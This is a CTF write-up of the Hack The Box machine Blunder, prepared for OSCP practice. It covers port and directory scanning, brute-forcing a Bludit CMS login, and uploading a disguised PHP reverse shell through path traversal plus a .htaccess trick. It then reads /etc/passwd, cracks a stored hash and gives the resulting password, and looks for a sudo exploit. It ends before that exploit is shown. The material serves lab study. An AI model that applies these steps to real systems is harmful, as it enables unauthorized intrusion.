Hack The Box — Blunder — without Metasploit (TJNull’s list for OSCP)

7 min readJun 1, 2023

This is my 22nd write-up for Blunder, a machine from TJNull’s list of HackTheBox machines for OSCP Practice. The full list can be found here.

In a general penetration test or a CTF, there are usually 3 major phases that are involved.

Enumeration and Scanning (Information Gathering).
Initial Foothold.
Privilege Escalation.

Let’s get started with the box!

Enumeration

In order to hack into a system we need to first gather some information about it. For that, we use Nmap to scan the ports of the target machine to find out what services are running; services that we can target. First let’s try to find out what ports are open and then we will run a detailed scan only on those ports to save time.

nmap -p- blunder.htb --max-retries=2

Only one port appears to be open, let’s run targeted Nmap scan on that.

nmap -sC -sV -T4 -A -p80 blunder.htb

And we have Apache 2.4.41 running on Ubuntu.

Let’s navigate to the web-server and see what we have there.

Just a normal page with nothing interesting. Let’s run gobuster to discover some directories.

gobuster dir -u http://blunder.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x php,cgi,sh,db,jsp,html,log,txt -t 200 -k --no-error

Here we got some directories and interesting files. By checking these directories and files, we come to know that we have an admin panel at /admin

And we check the /todo.txt

We got a hint that the username could be fergus and it has something to do with images.

Now, we know the username and we also know that it’s running Bludit CMS.

Initial Foothold

By doing a quick Google search for Bludit exploit I got the following exploit for bluidit 3.9.2

https://github.com/0xkasra/CVE-2019-16113

If check the source of our CMS login we can see that version 3.9.2 is mentioned a lot. So, this could be our exploit. Let’s check it out.

It seems like this exploit can brute force and get an RCE on the CMS. Let’s try running it.

I tried running it against username fergus and rockyou.txt as the password list but it was taking forever. So, I generated a wordlist out of the web-server’s home page, because it had a lot of text. I generated the wordlist using cewl.

cewl http://blunder.htb > cewl.txt

So, I tried this newly created wordlist to brute force.

The exploit found the credentials but it failed to get a reverse shell. Let’s check if the credentials are valid.

Credentials are valid!

If we go to New content on the left panel, we have an Image upload functionality. And if we remember the todo.txt gave a hint about images.

Let’s try to upload a php reverse shell.

It says we can only upload gif, png, jpg, jpeg and svg. Let’s change the extension of our shell from php to gif.

Let’s try the upload again.

And it gets uploaded.

Searching for more exploits gave me the following metasploit exploit

https://www.exploit-db.com/exploits/47699

Looking at the code we can see that first, it uploads the php shell to ../../tmp and then it writes a .htaccess file to make the .png files run the php code.

Maybe we can try uploading the gif manually and use burpsuite to upload it to ../../tmp instead of bl-content/uploads/pages/<32-character-randomhex>/.

Let’s upload our file to bl-content/tmp

If we scroll down to the request that we intercepted, we can see that the uuid has the same random 32 character destination directory. We should change it to ../../tmp.

The upload progress bar turned Green, indicating that the file has been uploaded.

Let’s create an htaccess.gif file, and put the metasploit script content in it that will make gif files execute the php code.

Let’s upload it the same way into the bl-conten/tmp by by intercepting the upload request and doing a ../../tmp to the uuid and changing the file name from htaccess.gif to .htaccess

This time it says that we can only upload image files. However, our file has been uploaded.

We can start a listener and navigate to /bl-content/tmp/phpshell.gif to get a reverse shell.

And we got a reverse shell!

Privilege Escalation

First, let’s invoke a python pty shell.

python -c 'import pty;pty.spawn("/bin/bash")'

Let’s see what users we have on the target.

cat /etc/passwd

And we can see we have hugo and shaun.

Now inside the /var/www we can see that we have 2 versions of bludit

3.9.2 that we exploited and there’s another one 3.10.0a, and we have not touched it yet. Let’s see what we have here.

Inside bludit-3.10.0a/bl-content/databses we have a file named users.php.

If we see the contents of that file.

We can see Hugo’s hash. We can try crackstation and see if we can crack it.

And we now know that the password is Password120. Let’s switch user to hugo using this password.

 su hugo

And we are Hugo. Let’s see what commands Hugo can run as sudo.

sudo -l

It tells us that Hugo can run all commands as sudo but it can run commands as all other users but not the root.

Now, if we check the sudo version

sudo -V

We can see that the sudo version running is 1.8.25p1 and there’s a well known vulnerability in this version. If we simply Google for this version and look for exploits we find the following exploit.